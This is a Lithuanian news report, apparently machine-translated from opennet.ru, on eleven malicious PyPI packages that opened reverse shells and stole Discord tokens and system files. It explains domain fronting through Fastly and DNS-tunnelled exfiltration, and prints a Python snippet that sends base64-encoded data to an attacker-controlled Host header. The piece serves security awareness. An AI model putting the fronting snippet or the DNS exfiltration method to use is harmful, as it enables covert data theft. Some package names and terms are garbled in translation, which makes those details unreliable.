PyPI (Python Package Index) kataloge buvo identifikuota 11 paketų su kenkėjišku kodu. Prieš nustatant problemas, paketai iš viso buvo atsisiųsti apie 38 tūkst. Aptikti kenkėjiški paketai pasižymi tuo, kad naudoja sudėtingus metodus, kad paslėptų ryšio kanalus su užpuolikų serveriais.
- Svarbus paketas (6305 atsisiuntimai), svarbus paketas (12897) – užmezgė ryšį su išoriniu serveriu, prisidengdamas prisijungimu prie pypi.python.org, kad suteiktų apvalkalo prieigą prie sistemos (atvirkštinis apvalkalas), ir naudojo trevorc2 programą, kad paslėptų komunikacijos kanalas.
- pptest (10001), ipboards (946) - naudojo DNS kaip ryšio kanalą informacijai apie sistemą perduoti (pirmame pakete pagrindinio kompiuterio pavadinimas, darbo katalogas, vidinis ir išorinis IP, antrame - vartotojo vardas ir pagrindinio kompiuterio pavadinimas) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) – sistemoje atpažino Discord paslaugos prieigos raktą ir išsiuntė jį išoriniam kompiuteriui.
- trrfab (287) – išoriniam kompiuteriui išsiuntė /etc/passwd, /etc/hosts, /home identifikatorių, pagrindinio kompiuterio pavadinimą ir turinį.
- 10Cent10 (490) – užmezgė atvirkštinį apvalkalo ryšį su išoriniu pagrindiniu kompiuteriu.
- yandex-yt (4183) – rodomas pranešimas apie pažeistą sistemą ir nukreiptas į puslapį su papildoma informacija apie tolesnius veiksmus, paskelbtą per nda.ya.ru (api.ya.cc).
Ypač atkreiptinas dėmesys į išorinių prieglobų prieigos metodą, naudojamą svarbių ir svarbių paketų paketuose, kurių veiklai paslėpti naudojamas greitas turinio pristatymo tinklas, naudojamas PyPI kataloge. Tiesą sakant, užklausos buvo siunčiamos į pypi.python.org serverį (įskaitant pavadinimo python.org nurodymą SNI HTTPS užklausoje), tačiau HTTP antraštėje „Host“ buvo nurodytas serverio, kurį valdo užpuolikai, pavadinimas (sek. forward.io. global.prod.fastly.net). Turinio pristatymo tinklas išsiuntė panašią užklausą atakuojančiam serveriui, naudodamas TLS ryšio parametrus į pypi.python.org, kai perduoda duomenis.
„PyPI“ infrastruktūrą palaiko „Fastly“ turinio pristatymo tinklas, kuris naudoja skaidrų „Varnish“ tarpinį serverį, kad kauptų dažniausiai pasitaikančias užklausas ir tvarkytų TLS sertifikatus CDN lygmeniu, o ne galiniuose serveriuose, kad nukreiptų HTTPS užklausas per tarpinį serverį. Nepriklausomai nuo tikslinio pagrindinio kompiuterio, užklausos nukreipiamos į tarpinį serverį, kuris nustato norimą pagrindinį kompiuterį pagal HTTP antraštę „Host“. domenų vardai Pagrindiniai kompiuteriai yra susieti su CDN apkrovos balansavimo įrenginio IP adresais, kurie yra bendri visiems „Fastly“ klientams.
Užpuoliko serveris taip pat registruojasi „Fastly“ CDN, kuris siūlo nemokamus planus visiems ir netgi leidžia anoniminę registraciją. Pažymėtina, kad atvirkštinis apvalkalas taip pat naudojamas užklausoms siųsti aukai, tačiau inicijuojamas užpuoliko kompiuterio. Iš išorės sąveika su užpuoliko serveriu atrodo kaip teisėti seansai su PyPI katalogu, užšifruoti naudojant TLS sertifikatas PyPI. Panaši technika, žinoma kaip „domeno priedų rodymas“, anksčiau buvo plačiai naudojama pagrindinių kompiuterių pavadinimams paslėpti apeinant blokavimą. Ši technika naudoja kai kurių CDN siūlomą HTTPS prieigos funkciją, nurodydama netikrą pagrindinio kompiuterio pavadinimą SNI ir faktiškai perduodama prašomą pagrindinio kompiuterio pavadinimą HTTP pagrindinio kompiuterio antraštėje TLS sesijos metu.
Siekiant paslėpti kenkėjišką veiklą, TrevorC2 paketas buvo papildomai naudojamas, kad sąveika su serveriu būtų panaši į įprastą žiniatinklio naršymą, pavyzdžiui, kenkėjiškos užklausos buvo siunčiamos prisidengiant vaizdo atsisiuntimu „https://pypi.python.org/images/ guid=“ su informacijos kodavimu guid parametre. url = "https://pypi.python.org" + "/images" + "?" + “guid=” + b64_payload r = request.Request(url, headers = {‘Priimančioji vieta’: „psec.forward.io.global.prod.fastly.net“})
pptest ir ipboards paketai naudojo kitokį tinklo veiklos slėpimo metodą, pagrįstą naudingos informacijos kodavimu DNS serverio užklausose. Kenkėjiška programa perduoda informaciją vykdydama DNS užklausas, tokias kaip „nu4timjagq4fimbuhe.example.com“, kuriose į valdymo serverį perduodami duomenys subdomeno pavadinime užkoduojami naudojant base64 formatą. Užpuolikas šiuos pranešimus gauna valdydamas example.com domeno DNS serverį.
Šaltinis: opennet.ru
